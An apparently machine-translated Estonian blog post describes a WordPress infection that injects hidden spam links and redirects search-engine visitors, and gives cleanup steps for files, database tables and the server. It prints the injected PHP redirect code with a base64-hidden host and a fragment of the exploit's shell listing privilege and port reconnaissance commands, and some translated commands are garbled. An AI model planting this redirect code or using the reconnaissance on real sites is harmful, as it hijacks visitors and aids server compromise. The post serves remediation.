Viimase kuu jooksul sain pidevalt hoiatusi viirus blogis mõnelt külastajalt. Algselt ignoreerisin hoiatusi, kuna mul oli installitud üsna hea viirusetõrje (Kaspersky AV 2009) ja kuigi veetsin blogis pikalt, ei saanud ma kordagi viirusehoiatust (.. mõni aeg tagasi nägin midagi kahtlast, mis esimesel värskendusel kadus. lõpuks...).
Aeglaselt, aeglaselt hakkasid ilmnema suured variatsioonid külastajate liiklus, mille järel on viimasel ajal liiklus pidevalt vähenenud ja üha rohkem on hakanud tulema inimesi, kes mulle seda ütlevad varjatud see on viirusaat. Eile sain kelleltki ekraanipildi, mis tehti siis, kui viirusetõrje blokeeris ühe stsenaarium saidilt stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. Minu jaoks oli piisavalt veenev, et hakkasin seda kõigist allikatest otsima. Esimene mõte, mis mul pähe tuli, oli see ära teha uuendus uusimale versioonile WordPress (2.5.1), kuid mitte enne kõigi vanade WordPressi skriptifailide kustutamist ja tegemist andmebaasi varundamine. See protseduur ei andnud tulemusi ja tõenäoliselt oleks mul kulunud palju aega, et aru saada, kus viga on, kui ta poleks mulle öelnud Eugen kohvi taga peetud arutelus, mille ta leidis link Google'is ja seda oleks hea näha.
MyDigitalLife.info avaldas artikli pealkirjaga: "WordPressi häkkimine: Google'i ja otsingumootori taastamine ja parandamine või küpsiste liiklust ei suunata ümber saidile Your-Needs.info, AnyResults.Net, Golden-Info.net ja muudele ebaseaduslikele saitidele”, mis on mul vajamineva lõime lõpp.
See on umbes a ära kasutama WordPressi poolt küpsiste põhjal, mis on minu meelest väga keeruline ja tehtud raamatu järgi. Piisavalt tark, et seda teha SQL-i süstimine ajaveebi andmebaasis, nähtamatu kasutaja loomiseks alates lihtsast rutiinsest kontrollist Armatuurlaud->Kasutajad, et kontrollida "kirjutatavaid" katalooge ja faile serveris (millel on chmod 777), otsida ja otsida hukata rühma- või isegi juurõigustega failid. Ma ei tea ärakasutamise nime ja näen, et selle kohta on kirjutatud vähe artikleid, hoolimata sellest, et nakatunud blogisid on palju, sealhulgas Rumeeniast. Ok... Püüan selgitada selle viiruse kohta üldistusi.
Mida viirus teeb?
Esiteks lisab see ajaveebi lehtede allikatesse külastajatele nähtamatud lingid, kuid otsingumootorite, eriti Google'i jaoks nähtavad ja indekseeritavad. Sel viisil teisaldada Page Rank ründaja näidatud saitidele. Teiseks sisestatakse veel üks ümbersuunamiskood URL külastajatele, kes tulevad Google'ist, Live'ist, Yahoo'st või RSS-lugejast ja kellel pole saiti küpsis. Ja viirusetõrje tuvastab selle ümbersuunamise kui Trojan-Clicker.HTML.
Sümptomid:
Külastajate liikluse tohutu langus, eriti blogides, kus enamik külastajaid tuleb Google'ist.
Tuvastage: (see on koht, kus probleem muutub keeruliseks neile, kes phpmyadminist, php-st ja linuxist palju ei tea)
The. ETTEVAATUST!!! ESIMESE TEE ANDMEBAASI VARUNDUS!!!
1. Kontrollige failiallikaid index.php, header.php, jalus.php, blogi teemast ja vaata, kas on krüptimist kasutav kood alus64 või sisaldab "if($ser=="1? && sizeof($_COOKIE)==0)” kujul:
<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>...või midagi sarnast. Kustuta see kood!
Vajutage ette kujutage…
Ülaltoodud ekraanipildil valisin ma ekslikult "<?php get_header(); ?>See kood peab jääma.
2. Kasutamine phpmyadmin ja minge andmebaasi tabeli juurde wp_users, kus kontrollite, kas kasutaja on ilma nimeta, loodud 00:00:00 0000-00-00 (see on võimalik põllul kasutaja_login kirjuta "WordPress". Kirjutage üles selle kasutaja ID (ID väli) ja seejärel kustutage see.
Vajutage ette kujutage…
*rohelisel real olev, selle ID tuleb kustutada ja alles jätta. Tema puhul unine, oli ID=8 .
3. Mine laua juurde wp_usermeta, kus sa pead asub Sa oled KUSTUTA ID-ga seotud read (kus väljal kasutaja_id kuvatakse kustutatud ID väärtus).
4. Tabelis wp_option, minge sisse active_plugins ja vaadake, milline pistikprogramm on kahtlaselt aktiveeritud. See võib kasutada lõppu nagu _old.giff, _old.pngg, _old.jpeg, _new.php.giffjne võltspildilaiendite kombinatsioonid laienditega _vana ja _uus.
SELECT * FROM wp_options WHERE option_name = 'active_plugins'Kustutage see pistikprogramm, seejärel minge ajaveebi -> Armatuurlaud -> Pluginad, kus saate teatud pistikprogrammi deaktiveerida ja aktiveerida.
Klõpsake pildil, et näha, kuidas nakatunud fail failis active_plugins kuvatakse.
Järgige Active_plugins näidatud FTP- või SSH-teed ja kustutage fail serverist.
5. Ka phpMyAdminis, tabelis wp_option, otsige üles ja kustutage rida, mis sisaldab "RIS_F541B3ABD05E7962FCAB37737F40FAD8"ja pöörake"internal_links_cache”.
Internal_links_cache, ajaveebis ilmuvad rämpspostilingid ja a Google Adsense kood, häkkerist.
6. Soovitatav on teil Parooli muutmine blogisse sisselogimisest jne eemaldage kõik kahtlased kasutajad. Minge üle WordPressi uusimale versioonile ja määrake ajaveebi nii, et see ei luba enam uusi kasutajaid registreerida. Kaotust pole... kommenteerida saavad ka mittelogitud.
Üritasin eespool selgitada, kui palju, mida sellises olukorras teha, et blogi sellest viirusest puhastada. Probleem on palju tõsisem, kui tundub ja pole kaugeltki lahendus, sest neid kasutatakse Turvahaavatavused hostivast veebiserverist, kus ajaveeb asub.
Esimese turvameetmena, kellel on juurdepääs Ssh, et kontrollida serveris, kas seal on ikka veel selliseid faile nagu *_old* ja *_new.* lõpuga .gif, .jpeg, .pngg, .jpgg. Need failid tuleb kustutada. Kui nimetame faili ümber, nt. top_right_old.giff sisse top_right_old.php, näeme, et fail sisaldab täpselt serveri kasutuskoodi.
Mõned kasulikud näpunäited serveri kontrollimiseks, puhastamiseks ja turvalisuse tagamiseks. (SSH kaudu)
1. cd /tmp ja kontrollige, kas selliseid kaustu on tmpVFlma või muid sarnaseid nimekombinatsioone ja kustutage see. Alloleval ekraanipildil näete minu jaoks kahte sellist kausta:
rm –rf numbrikaust
2. Kontrolli ja elimineeri (muuda chmodi) nii palju kui võimalik atribuutidega kaustu chmod 777
Leia kõik kirjutatavad failid praegusest kaustast: leida . -tüüp f -perm -2 -ls
Leia kõik kirjutatavad kataloogid praegusest kaustast: leida . -tüüp d -perm -2 -ls
Leia kõik kirjutatavad kataloogid ja failid praegusest kaustast: leidke. -Perm -2 -ls
3. Otsige serverist kahtlasi faile.
find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"4, ETTEVAATUST!!! bitti määravatele failidele LÕUNA ja Uisutada. Need failid käivituvad kasutaja (rühma) või administraatori õigustega, mitte faili käivitava kasutaja õigustega. Need failid võivad turbeprobleemide korral viia root kompromissini. Kui te ei kasuta SUID- ja SGID-bittidega faile, käivitage "chmod 0" või desinstallige neid sisaldav pakett.
Exploit sisaldab kuskil allikas...:
if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}...praktiliselt nii leiab ta turvarikkumisi. Avage pordid, "kirjutatavad" kataloogid ja failide käivitamine rühma / juurõigustega.
Tulen üksikasjadega tagasi...
Mõned nakatunud blogid: www.blegoo.com, www.visurat.ro,
fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,
blog.hrmarket.ro, www.nitza.ro,
motociclete.motomag.ro,
emi.brainient.com, www.picsel.ro,
www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiology.ro,
www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,
dragos.roua.ro, www.artistul.ro/blog/,
www.mirabilismedia.ro/blog, blog.einvest.ro
... ja seda loetelu võib jätkata ... palju.
Saate kontrollida, kas ajaveebi on nakatunud, kasutades Google'i otsingumootorit. kopeerida & kleebi:
sait: www.blegoo.com osta
Head ööd ja head tööd ;) Varsti arvan, et Eugen tuleb uudistega, aadressil prevezibil.imprevizibil.com.
brb :)
AT: TÄHELEPANU! WordPressi teema muutmine või versioonile WordPress 2.5.1 üleminek EI OLE lahendus sellest viirusest vabanemiseks.
